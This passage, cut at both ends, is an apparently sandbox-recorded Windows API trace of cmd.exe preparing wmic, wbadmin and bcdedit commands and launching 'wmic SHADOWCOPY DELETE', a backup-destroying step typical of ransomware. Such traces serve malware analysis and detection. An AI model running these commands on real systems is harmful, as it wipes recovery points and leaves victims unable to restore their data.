lpLCData=".") returned 2 [0113.228] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf6f7f8, cchData=8 | out: lpLCData=",") returned 2 [0113.228] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0113.231] GetProcessHeap () returned 0xaa0000 [0113.231] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x0, Size=0x20c) returned 0xaa7ac0 [0113.231] GetConsoleTitleW (in: lpConsoleTitle=0xaa7ac0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0113.581] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0113.581] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0113.581] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0113.581] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0113.581] ??_V@YAXPAX@Z () returned 0x1 [0113.582] GetProcessHeap () returned 0xaa0000 [0113.582] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x400a) returned 0xaa8ee8 [0113.582] GetProcessHeap () returned 0xaa0000 [0113.582] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa8ee8) returned 1 [0113.583] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0113.583] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0113.583] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0113.583] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0113.583] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0113.583] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0113.583] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0113.583] GetProcessHeap () returned 0xaa0000 [0113.583] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa7cd8 [0113.583] GetProcessHeap () returned 0xaa0000 [0113.583] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x12) returned 0xaa7d38 [0113.583] GetProcessHeap () returned 0xaa0000 [0113.583] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x30) returned 0xaa7d58 [0113.584] GetProcessHeap () returned 0xaa0000 [0113.585] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa7d90 [0113.585] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0113.585] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0113.585] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0113.585] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0113.585] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0113.585] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0113.585] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0113.585] GetProcessHeap () returned 0xaa0000 [0113.585] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa7df0 [0113.585] GetProcessHeap () returned 0xaa0000 [0113.585] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x18) returned 0xaa7e50 [0113.586] GetProcessHeap () returned 0xaa0000 [0113.586] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x3e) returned 0xaa7e70 [0113.586] GetProcessHeap () returned 0xaa0000 [0113.587] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa7eb8 [0113.587] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0113.587] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0113.587] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0113.587] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0113.587] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0113.588] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0113.588] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0113.588] GetProcessHeap () returned 0xaa0000 [0113.588] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa7f18 [0113.588] GetProcessHeap () returned 0xaa0000 [0113.588] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x20) returned 0xaa7f78 [0113.589] GetProcessHeap () returned 0xaa0000 [0113.589] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x74) returned 0xaa7fa0 [0113.589] GetProcessHeap () returned 0xaa0000 [0113.589] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa8020 [0113.590] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0113.590] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0113.590] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0113.590] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0113.590] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0113.590] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0113.590] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0113.590] GetProcessHeap () returned 0xaa0000 [0113.590] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x58) returned 0xaa8080 [0113.590] GetProcessHeap () returned 0xaa0000 [0113.590] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x20) returned 0xaa80e0 [0113.591] GetProcessHeap () returned 0xaa0000 [0113.591] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x52) returned 0xaa8108 [0113.592] GetConsoleTitleW (in: lpConsoleTitle=0x6ffb10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0113.897] malloc (_Size=0xffce) returned 0xbb2700 [0113.897] ??_V@YAXPAX@Z () returned 0x6ff89c [0113.898] malloc (_Size=0xffce) returned 0xbc26d8 [0113.898] ??_V@YAXPAX@Z () returned 0x6ff654 [0113.899] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0113.899] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0113.899] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0113.899] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0113.899] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0113.899] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0113.899] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0113.899] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0113.899] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0113.899] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0113.899] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0113.899] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0113.900] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0113.900] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0113.900] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0113.900] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0113.900] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0113.900] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0113.900] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0113.900] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0113.900] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0113.900] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0113.900] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0113.900] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0113.900] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0113.900] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0113.900] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0113.900] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0113.900] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0113.900] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0113.900] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0113.900] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0113.900] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0113.900] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0113.900] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0113.900] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0113.900] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0113.900] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0113.900] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0113.900] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0113.900] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0113.900] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0113.901] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0113.901] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0113.901] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0113.901] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0113.901] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0113.901] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0113.901] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0113.901] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0113.901] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0113.901] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0113.901] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0113.901] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0113.901] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0113.901] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0113.901] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0113.901] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0113.901] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0113.901] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0113.901] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0113.901] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0113.901] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0113.901] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0113.901] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0113.901] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0113.901] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0113.901] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0113.901] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0113.901] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0113.901] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0113.901] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0113.902] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0113.902] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0113.902] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0113.902] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0113.902] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0113.902] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0113.902] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0113.902] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0113.902] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0113.902] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0113.902] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0113.902] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0113.902] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0113.902] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0113.902] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0113.902] ??_V@YAXPAX@Z () returned 0x1 [0113.902] GetProcessHeap () returned 0xaa0000 [0113.902] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xffd6) returned 0xaa8ee8 [0113.903] GetProcessHeap () returned 0xaa0000 [0113.904] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x3a) returned 0xaa8168 [0113.904] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0113.904] malloc (_Size=0xffce) returned 0xbc26d8 [0113.904] ??_V@YAXPAX@Z () returned 0x6ff3d4 [0113.904] GetProcessHeap () returned 0xaa0000 [0113.904] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1ffa4) returned 0xab8ec8 [0113.906] SetErrorMode (uMode=0x0) returned 0x0 [0113.906] SetErrorMode (uMode=0x1) returned 0x0 [0113.906] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0xab8ed0, lpFilePart=0x6ff3f4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff3f4*="Desktop") returned 0x17 [0113.907] SetErrorMode (uMode=0x0) returned 0x1 [0113.907] GetProcessHeap () returned 0xaa0000 [0113.907] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xab8ec8, Size=0x42) returned 0xab8ec8 [0113.907] GetProcessHeap () returned 0xaa0000 [0113.907] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xab8ec8) returned 0x42 [0113.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0113.907] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0113.907] GetProcessHeap () returned 0xaa0000 [0113.907] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1b4) returned 0xaa81b0 [0113.907] GetProcessHeap () returned 0xaa0000 [0113.907] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x360) returned 0xaa0ae0 [0113.917] GetProcessHeap () returned 0xaa0000 [0113.917] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa0ae0, Size=0x1b6) returned 0xaa0ae0 [0113.917] GetProcessHeap () returned 0xaa0000 [0113.917] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa0ae0) returned 0x1b6 [0113.917] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.917] GetProcessHeap () returned 0xaa0000 [0113.917] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xe0) returned 0xaa0ca0 [0113.917] GetProcessHeap () returned 0xaa0000 [0113.917] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa0ca0, Size=0x76) returned 0xaa0ca0 [0113.917] GetProcessHeap () returned 0xaa0000 [0113.917] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa0ca0) returned 0x76 [0113.918] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.918] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xffffffff [0113.919] GetLastError () returned 0x2 [0113.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.919] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xffffffff [0113.919] GetLastError () returned 0x2 [0113.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.919] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xffffffff [0113.920] GetLastError () returned 0x2 [0113.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.920] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xffffffff [0113.920] GetLastError () returned 0x2 [0113.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.920] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xaa8370 [0113.925] GetProcessHeap () returned 0xaa0000 [0113.925] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x0, Size=0x14) returned 0xaa0d20 [0113.925] FindClose (in: hFindFile=0xaa8370 | out: hFindFile=0xaa8370) returned 1 [0113.926] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xffffffff [0113.927] GetLastError () returned 0x2 [0113.928] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x6ff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff180) returned 0xaa8370 [0113.929] GetProcessHeap () returned 0xaa0000 [0113.929] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa0d20, Size=0x4) returned 0xaa0d20 [0113.929] FindClose (in: hFindFile=0xaa8370 | out: hFindFile=0xaa8370) returned 1 [0113.930] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0113.930] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0113.930] ??_V@YAXPAX@Z () returned 0x1 [0113.930] GetConsoleTitleW (in: lpConsoleTitle=0x6ff684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0114.192] InitializeProcThreadAttributeList (in: lpAttributeList=0x6ff5b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x6ff59c | out: lpAttributeList=0x6ff5b0, lpSize=0x6ff59c) returned 1 [0114.192] UpdateProcThreadAttribute (in: lpAttributeList=0x6ff5b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x6ff598, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6ff5b0, lpPreviousValue=0x0) returned 1 [0114.192] GetStartupInfoW (in: lpStartupInfo=0x6ff5e8 | out: lpStartupInfo=0x6ff5e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0114.193] GetProcessHeap () returned 0xaa0000 [0114.193] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x18) returned 0xaa8370 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.194] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.194] GetProcessHeap () returned 0xaa0000 [0114.194] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa8370) returned 1 [0114.194] GetProcessHeap () returned 0xaa0000 [0114.194] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xa) returned 0xaa8370 [0114.195] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.197] _get_osfhandle (_FileHandle=1) returned 0x90 [0114.197] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0114.441] _get_osfhandle (_FileHandle=0) returned 0x8c [0114.441] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0114.611] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic SHADOWCOPY DELETE ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x6ff538*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic SHADOWCOPY DELETE ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6ff584 | out: lpCommandLine="wmic SHADOWCOPY DELETE ", lpProcessInformation=0x6ff584*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x564, dwThreadId=0xafc)) returned 1 [0115.344] CloseHandle (hObject=0xdc) returned 1 [0115.344] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.344] GetProcessHeap () returned 0xaa0000 [0115.344] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa6de0) returned 1 [0115.344] GetEnvironmentStringsW () returned 0xaa6de0* [0115.344] GetProcessHeap () returned 0xaa0000 [0115.344] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xb1a) returned 0xaa4d58 [0115.344] FreeEnvironmentStringsA (penv="=") returned 1 [0115.344] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0161.493] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x6ff51c | out: lpExitCode=0x6ff51c*=0x80041014) returned 1 [0161.493] CloseHandle (hObject=0xe0) returned 1 [0161.493] _vsnwprintf (in: _Buffer=0x6ff604, _BufferCount=0x13, _Format="%08X", _ArgList=0x6ff524 | out: _Buffer="80041014") returned 8 [0161.494] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0161.495] GetProcessHeap () returned 0xaa0000 [0161.495] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa4d58) returned 1 [0161.495] GetEnvironmentStringsW () returned 0xaa83a0* [0161.495] GetProcessHeap () returned 0xaa0000 [0161.495] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xb40) returned 0xaa4b80 [0161.496] FreeEnvironmentStringsA (penv="=") returned 1 [0161.496] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0161.496] GetProcessHeap () returned 0xaa0000 [0161.496] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa4b80) returned 1 [0161.496] GetEnvironmentStringsW () returned 0xaa83a0* [0161.496] GetProcessHeap () returned 0xaa0000 [0161.496] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xb40) returned 0xaa4b80 [0161.496] FreeEnvironmentStringsA (penv="=") returned 1 [0161.496] GetProcessHeap () returned 0xaa0000 [0161.496] RtlFreeHeap (HeapHandle=0xaa0000, Flags=0x0, BaseAddress=0xaa8370) returned 1 [0161.496] DeleteProcThreadAttributeList (in: lpAttributeList=0x6ff5b0 | out: lpAttributeList=0x6ff5b0) [0161.496] ??_V@YAXPAX@Z () returned 0x1 [0161.496] GetConsoleTitleW (in: lpConsoleTitle=0x6ffab0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0161.594] malloc (_Size=0xffce) returned 0xbb2700 [0161.594] ??_V@YAXPAX@Z () returned 0x6ff83c [0161.594] malloc (_Size=0xffce) returned 0xbc26d8 [0161.594] ??_V@YAXPAX@Z () returned 0x6ff5f4 [0161.594] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0161.594] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0161.594] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0161.594] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0161.594] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0161.594] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0161.594] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0161.594] _wcsicmp 